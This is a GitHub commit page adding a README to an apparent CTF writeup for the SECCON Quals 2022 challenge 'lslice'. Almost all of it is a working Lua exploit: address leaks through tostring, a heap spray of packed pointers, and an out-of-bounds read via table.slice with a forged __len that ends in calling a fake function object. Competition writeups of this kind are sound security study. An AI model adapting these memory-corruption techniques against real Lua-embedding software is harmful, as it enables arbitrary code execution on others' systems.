Commit 79879e8

authored

Create README.md

1 parent 0653784 commit 79879e8Copy full SHA for 79879e8

File tree

1 file changed

+95

-0

lines changed

2022/seccon-quals-2022/lslice
- README.md

1 file changed

+95

-0

lines changed

`‎2022/seccon-quals-2022/lslice/README.md`

Lines changed: 95 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,95 @@`
	`1`	`+1. spray fake object contents`
	`2`	`+2. read fake object header out of bounds`
	`3`	`+3. call fake object (function)`
	`4`	`+`
	`5`	`+`
	`6`	+```py
	`7`	`+function addrof(v)`
	`8`	`+ local strrep = tostring(v)`
	`9`	`+ local i = string.find(strrep, '0x')`
	`10`	`+ if i == nil then`
	`11`	`+ error("Cannot obtain address of given value")`
	`12`	`+ end`
	`13`	`+ return tonumber(string.sub(strrep, i+2), 16)`
	`14`	`+end`
	`15`	`+`
	`16`	`+function hex(v)`
	`17`	`+ return string.format("0x%x", v)`
	`18`	`+end`
	`19`	`+`
	`20`	`+function hexdump(buf)`
	`21`	`+ local str = ''`
	`22`	`+ for i=1,math.ceil(#buf/16) * 16 do`
	`23`	`+ if (i-1) % 16 == 0 then`
	`24`	`+ str = str .. string.format('%08X ', i-1)`
	`25`	`+ end`
	`26`	`+ str = str .. (i > #buf and ' ' or string.format('%02X ', buf:byte(i)))`
	`27`	`+ if i % 8 == 0 then`
	`28`	`+ str = str .. ' '`
	`29`	`+ end`
	`30`	`+ if i % 16 == 0 then`
	`31`	`+ str = str .. '\n'`
	`32`	`+ end`
	`33`	`+ end`
	`34`	`+ return str`
	`35`	`+end`
	`36`	`+`
	`37`	`+print("start")`
	`38`	`+collectgarbage("stop")`
	`39`	`+win_addr = addrof(print) - 0x1def0`
	`40`	`+`
	`41`	`+packed_string = string.pack("<L",win_addr)`
	`42`	`+`
	`43`	`+spray = {}`
	`44`	`+spray2 = {}`
	`45`	`+for i = 1000,2000 do`
	`46`	`+ spray2[i] = packed_string .. "xxxx" .. i`
	`47`	`+end`
	`48`	`+`
	`49`	`+for i = 1000,2000 do`
	`50`	`+ spray[i] = packed_string .. "iiii" .. i`
	`51`	`+end`
	`52`	`+spray_addr = addrof(spray) +0xc8 - 24`
	`53`	`+print("spray @ " .. spray_addr)`
	`54`	`+`
	`55`	`+`
	`56`	`+groom = {}`
	`57`	`+for i = 1000,9999 do`
	`58`	`+ groom[i] = "AAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .. i`
	`59`	`+end`
	`60`	`+`
	`61`	`+`
	`62`	`+`
	`63`	`+a = {}`
	`64`	`+a[1] = 1`
	`65`	`+a[2] = 2`
	`66`	`+a[3] = 3`
	`67`	`+a[4] = 4`
	`68`	`+a[5] = 5`
	`69`	`+a[6] = 5`
	`70`	`+`
	`71`	`+`
	`72`	`+`
	`73`	`+m = { __len = function (tbl) return 64 end }`
	`74`	`+setmetatable(a, m)`
	`75`	`+fake = "AAAABBBB" .. "AAAABBBB" .. "\x03\x00\x00\x00\x00\x00\x00\x00" .. string.pack("<L", spray_addr) .. "\x26\x00\x00\x00\x00\x00\x00\x00" .. "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"`
	`76`	`+`
	`77`	`+b = table.slice(a, 1, 64)`
	`78`	`+func_index = 0`
	`79`	`+`
	`80`	`+for i = 1,128 do`
	`81`	`+ if type(b[i]) == 'number' then`
	`82`	`+ print(i, hex(b[i]))`
	`83`	`+ end`
	`84`	`+ if b[i] == 0x4242424241414141 then`
	`85`	`+ func_index = i+1`
	`86`	`+ break`
	`87`	`+ end`
	`88`	`+end`
	`89`	`+`
	`90`	`+b[func_index]()`
	`91`	`+`
	`92`	`+while(true)`
	`93`	`+do`
	`94`	`+end`
	`95`	+```

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 79879e8

File tree

1 file changed

1 file changed

`‎2022/seccon-quals-2022/lslice/README.md`

0 commit comments